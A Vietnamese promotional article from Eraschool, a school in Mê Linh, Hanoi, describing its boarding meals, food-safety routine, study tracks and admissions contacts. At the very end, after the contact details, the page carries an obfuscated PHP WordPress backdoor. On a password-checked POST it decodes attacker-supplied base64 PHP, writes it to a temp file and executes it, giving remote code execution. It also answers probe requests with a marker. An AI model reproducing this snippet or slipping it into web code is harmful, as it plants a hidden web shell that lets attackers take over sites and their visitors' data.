Bữa ăn bán trú của trường liên cấp Eraschool như thế nào?

post

Dinh dưỡng học đường luôn là một trong những yếu tố được phụ huynh quan tâm, nhất là ở các trường liên cấp như Eraschool. Vậy bữa ăn bán trú ở trường tại Eraschool như thế nào? Nguồn gốc nguyên liệu chế biến có đảm bảo không? Mời các bậc phụ huynh đọc bài viết dưới đây.

Nguồn gốc của nguyên liệu chế biến bữa ăn của trường

Ngay từ khi thành lập, Eraschool đã luôn chú trọng tới chế độ dinh dưỡng học đường. Nhà trường luôn cố gắng chế biến những bữa ăn lành mạnh, đầy đủ dinh dưỡng, khoa học, phù hợp với độ tuổi để đáp ứng được nhu cầu phát triển thể chất của từng độ tuổi. Bên cạnh đó, thực đơn được thay đổi theo tuần và theo mùa để đảm bảo cân bằng dưỡng chất, phong phú, kích thích sự ngon miệng ở trẻ. 

Dinh dưỡng đảm bảo giúp con thoải mái và tập trung học tập 
Dinh dưỡng đảm bảo giúp con thoải mái và tập trung học tập

Để thực hiện được mục tiêu này, trường liên cấp Eraschool sử dụng 2 nguồn nguyên liệu để chế biến bữa ăn tại trường là: nguyên liệu được nuôi trồng và sản xuất tại hệ thống trang trại giáo dục Erahouse và mua từ các nguồn cung cấp đảm bảo chất lượng và có nguồn gốc rõ ràng. Bên cạnh đó, nhà trường cũng áp dụng chế độ ngày 4 bữa/học sinh (gồm bữa sáng, phụ sáng, bữa trưa, chiều).

Ngoài ra, Eraschool áp dụng quy trình kiểm tra an toàn thực phẩm nghiêm ngặt và vận hành bếp một chiều để đảm bảo tiêu chuẩn và đúng quy định về bếp ăn học đường. Mọi bữa ăn luôn được lưu mẫu tối thiểu 24h theo đúng quy định. Nhân viên bếp luôn được tổ chức khám sức khoẻ và tập huấn công tác vệ sinh an toàn thực phẩm theo quy định hàng năm.

Vài nét về trường sinh thái liên cấp Eraschool

Tên đầy đủ của Eraschool là trường Phổ thông Liên cấp Sinh thái Eraschool
Tên đầy đủ của Eraschool là trường Phổ thông Liên cấp Sinh thái Eraschool

Trường liên cấp Eraschool nằm trong Hệ thống giáo dục Sinh thái Erahouse, hệ thống các mô hình trải nghiệm thực tế gắn với giáo dục sáng tạo cho học sinh các lứa tuổi từ tiền tiểu học đến THCS. Tên đầy đủ của Eraschool là trường Phổ thông Liên cấp Sinh thái Eraschool. Đây là ngôi trường nằm giữa thiên nhiên rộng lớn tại Mê Linh – Hà Nội, tự hào mang đến cho học sinh môi trường học tập lành mạnh, giúp các em phát triển cả về trí tuệ, thể chất và tâm hồn. 

Khi theo học tại mô hình trường học xanh Eraschool, các em học sinh sẽ được tích cực, chủ động tham gia vào quá trình tự học, tự tìm ra kiến thức để phát triển bản thân. Ngoài ra, bằng cách tạo ra môi trường học tập và trải nghiệm khuyến khích học sinh tham gia vào các hành động xanh, Eraschool cũng mong muốn truyền cho các em tinh thần trách nhiệm và trau dồi tư duy bền vững mà các em có thể áp dụng hàng ngày. 

Trường liên cấp Eraschool đang có 2 hệ đào tạo dành cho các định hướng học tập khác nhau của ba mẹ. Nếu ba mẹ muốn con học tiếng anh từ khi còn nhỏ và sử dụng tiếng anh như ngôn ngữ thứ 2 thì ba mẹ nên cho con theo học hệ song ngữ. Nếu ba mẹ có định hướng cho con đi du học hoặc học tiếp các chương trình tiếng anh khác trong nước thì nên chọn hệ quốc tế. Tuy nhiên, dù ba mẹ cho con theo học hệ đào tạo nào thì trẻ cũng được tiếp xúc với tiếng anh ngay từ nhỏ, điều này rất tốt cho việc tiếp thu ngôn ngữ mới ở trẻ. 

Các hình thức tuyển sinh vào trường

Eraschool triển khai cả 2 phương thức đăng ký tuyển sinh là trực tiếp và trực tuyến
Eraschool triển khai cả 2 phương thức đăng ký tuyển sinh là trực tiếp và trực tuyến

Nhằm hỗ trợ phụ huynh đăng ký tuyển sinh vào lớp 1 và lớp 6, tuyển sinh bổ sung các lớp 2,3,4,5,7,8,9, Eraschool triển khai cả 2 phương thức đăng ký tuyển sinh là trực tiếp và trực tuyến. Đối với hình thức trực tiếp, phụ huynhcó thể đến làm thủ tục đăng ký tại văn phòng nhà trường vào khung giờ từ 08h00 đến 17h30 hàng ngày. Đối với hình thức trực tuyến, phụ huynh vui lòng liên hệ trực tiếp tới hotline 0899.889.818 để được tư vấn cụ thể. 

Mong rằng với những thông tin về bữa ăn bán trú được cung cấp trong bài viết này, quý phụ huynh đã hiểu hơn về trường liên cấp Eraschool cũng như đã có quyết định lựa chọn trường cho mình. Eraschool mong rằng, mình sẽ là 1 phần trong kế hoạch hiện thực hoá tương lai của ba mẹ, cùng ba mẹ viết nên những bản giao hưởng hạnh phúc cho con. 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}